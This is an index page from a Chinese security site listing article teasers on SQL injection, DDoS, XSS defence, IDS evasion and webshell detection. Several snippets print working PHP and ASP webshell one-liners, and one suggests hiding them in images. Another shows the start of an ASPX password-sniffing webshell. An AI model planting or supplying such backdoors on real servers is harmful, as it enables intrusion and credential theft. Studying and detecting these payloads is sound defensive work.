首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>网络安全>列表
网络游戏安全小议(端游/页游/手游)
  日期:2013-01-14 10:37:54 点击:159 评论:0
一、网络游戏安全很有趣 一直很想知道魔兽的游戏安全工程师是如何做游戏安全的,毫无疑问,魔兽是目前最流行的网络游戏,有着众多经验丰富的黑客在利润驱动的情况下以这款游戏的外挂作弊技术谋生,游戏黑客的作弊技能在《网络游戏安全解密》这本书里有提到(这是目前为
Auto pentesting. Nmap, SSLscans, screenshots, amap!
  日期:2012-03-21 11:58:29 点击:108 评论:0
Heres my automated scanning script. Its got a few dependencies but will run with a number of threads and will output to a defined folder. #!/bin/bash #__________________________________________________________ # Author: phillips321 forum.gnacktrack.
浅谈新型的sql注入测试
  日期:2012-02-24 12:07:59 点击:123 评论:0
前段时间,帮别人看网站,习惯性的,and 1=1 其实知道这种肯定被过滤,但还是测试了 php+mysql 首先说判断: Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null 或: and 2=3 其实,很多人习惯性的用=号来判断了,但是,如: = ,= ,is null,is not nu
浅谈Ddos攻击攻击与防御
  日期:2012-02-13 12:51:48 点击:76 评论:0
EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2011-2-10 From: http://www.80sec.com/ [ 目录 ] 一 背景 二 应急响应 三 常见ddos攻击及防御 四 根源及反击 五 总结 一 背景 在前几天,我们运营的某网站遭受了一次ddos攻击,我们的网站是一个公益性质的
常见 Webshell 的检测方法及检测绕过思路
  日期:2012-02-13 11:04:09 点击:161 评论:0
Webshell的因素 我们从一个最简单的webshell结构可以看出其基本结构:?php eval($_POST[a]);? 从目前被公布的一句话webshell来看,基本都符合这个结构,即shell的实现需要两步:数据的传递、执行所传递的数据。 数据传递绕过检测 对于数据传递,我们通常的做法是使用$_
asp,php,aspx一句话集合
  日期:2012-02-02 09:41:08 点击:1154 评论:0
推荐还是把一句话加进图片里面去。 普通的php一句话:?php @eval($_POST['r00ts']);? 普通的asp一句话:%eval(Request.Item[r00ts],unsafe);% aspx突破一流的: script language=VBScript runat=server dim da set fso=server.createobject(scripting.filesystemobject
Content-Type 防范 XSS 绕过
  日期:2011-08-02 11:39:21 点击:445 评论:0
一、前言 09 年写过一篇文章:json xss 防范(http://www.woyigui.cn/2009/04/28/json-xss/)。文章描述了控制Content-type类型,用于 json 回调 callback 函数接口(如:http://y.baidu.com/vote/data/detail_vote/290b873e69f2ec33a1e0c9f2?alt=html callback =window
PHP中的密码学算法及其应用2-对称密码算法
  日期:2011-06-13 11:27:59 点击:162 评论:0
Author:fleshwound From:Security Matrix( http://www.smatrix.org ), 转载请注明出处! ////////////////////////////////////////////////////////////////////////////// 目录 1.PHP的散列函数及其应用 2.PHP中的对称密码算法及其应用 3.PHP的公钥密码算法及其应用 /
web sniffer 在线嗅探/online http sniff,还有一个webshell sniffer
  日期:2011-05-27 10:55:52 点击:1424 评论:0
http://web-sniffer.net/ 是在线的web sniff。 还有一个webshell的,放在asp.net的空间,嗅探本服务器的ftp,http,smtp,pop3等密码 支持.net 2.0,不支持1.0吧(转的)。 %@ Page Language=C# ValidateRequest=false % %@ Import Namespace=System.Net.Sockets % %@ Imp
利用PHP编程防范XSS跨站脚本攻击
  日期:2011-05-27 10:52:57 点击:126 评论:1
国内不少论坛都存在跨站脚本漏洞,国外也很多这样的例子,甚至Google也出现过,不过在12月初时修正了。(编者注:关于跨站脚本漏洞攻击,读者可参阅《详解XSS跨站脚本攻击》)。跨站攻击很容易就可以构造,而且非常隐蔽,不易被查觉(通常盗取信息后马上跳转回原页面)。
Web开发框架安全杂谈
  日期:2011-03-16 10:46:56 点击:120 评论:0
Web开发框架安全杂谈 EMail: wofeiwo#80sec.com Site: http://www.80sec.com Date: 2011-03-14 From: http://www.80sec.com/ [ 目录 ] 000 起 001 承 002 转 003 合 000起 最近框架漏洞频发,struts任意代码执行、Django csrf token防御绕过、Cakephp代码执行等等各大
记录一次网站被黑抓马记
  日期:2011-01-18 09:54:24 点击:90 评论:0
前言: 昨天接到一个朋友的委托,任务是解决网站遇到英文浏览器自动跳转到另一个网站的问题。 背景: 现在的网络时代,黑客与商业并存的时代。有些人利用入侵技术来达到利益问题,成为网络中的黑色产业链。有人利用入侵挂马,抓肉鸡。有人利用入侵挂链,做SEO优化。呵
从真实故事说起 读黑客战术社会工程学
  日期:2010-12-22 09:58:56 点击:119 评论:0
一个真实的故事 几年前的一个早晨,一群陌生人走进了一家大型远洋运输公司并控制了该公司的整个计算机网络。他们是怎么做到的?是通过从该公司的许多不同的员工那里一点点的获得帮助来达到目的的。首先,他们在实地踩点的两天之前已经对该公司进行了研究了解。例如,通
麻烦的终结者
  日期:2010-12-21 09:23:05 点击:128 评论:0
上次演讲的全文出来了,是速记的同学记下来的。原文在 http://www.techweb.com.cn/people/2010-12-05/723950.shtml 但是没校对过,有很多文字错误,语句也不太通顺,我把我校对后版本的贴到这里。 因为是给中小网站站长做的介绍性演讲,所以谈的不是技术细节。 原文 各
SPIKE与Peach Fuzzer相关知识
  日期:2010-10-25 12:36:26 点击:1219 评论:0
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. 这篇文章将为你讨论评估Cisco Web服务安全性的一些方式,有几种框架和工具在进行这种评估时非常有用,不过不幸的是,有些是私有的、价格昂贵的闭源软件。可以利用几种不错的商用工具执行安全评估
网络渗透测试指导手册
  日期:2010-09-29 15:41:35 点击:352 评论:0
什么是网络渗透测试?渗透测试是一种最老的评估计算机系统安全性的方法。虽然渗 透测试的主要目标是发现组织中网络基础架构的安全漏洞;但是它也可能有许多次要目 标,包括测试组织的安全问题识别和响应能力,测试员工安全知识或测试安全性政策规范 等。本文手册介绍了
一句话木马
  日期:2010-07-28 10:46:50 点击:11381 评论:1
asp一句话木马 程序代码 %eval request(sb)% 程序代码 %execute request(sb)% 程序代码 %execute(request(sb))% 程序代码 %execute request(sb)%%'% loop %:% 程序代码 %'% loop %:%%execute request(sb)% 程序代码 %execute request(sb)'% loop %:%[code] [code]script
自动化操控虚拟战争
  日期:2010-05-13 10:45:01 点击:180 评论:0
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. 简介 ~~~~~ 本文概述利用内核代码执行对数字游戏产生的影响,这样做的理由是如果不扫描内核的话,游戏客户端无法扫描外挂代码,所有代码从进程空间无法获取,这和通常的外挂制作方法完全不同。 开
IDS规避与对策
  日期:2010-01-04 11:02:56 点击:132 评论:0
Copyright (c) 2010 Czy Invicta Hack01@Live!cn All rights reserved. ========================================================= 案例1:入侵检测系统分片重组超时低于受害者分片重组的超时 ========================================================= 攻击情形:
系统监控:蜜罐分析技术
  日期:2009-12-21 15:06:39 点击:135 评论:0
Copyright (c) 2009 Czy Invicta Hack01@Live!cn All rights reserved. 前言 ~~~~~~~~ 本文我将要讨论的是对一个被入侵的系统进行逐步地研究,而工具和入侵技术不作为重点。我们将集中精力讨论如何把信息拼揍在一起,来分析到底发生了什么事情。我写这篇文章其目的是帮
共15页/284条记录 首页 1 [2] [3] [4] [5] [6] [7] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  Exploits
  系统安全
  网络基础
  病毒分析
网络安全
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved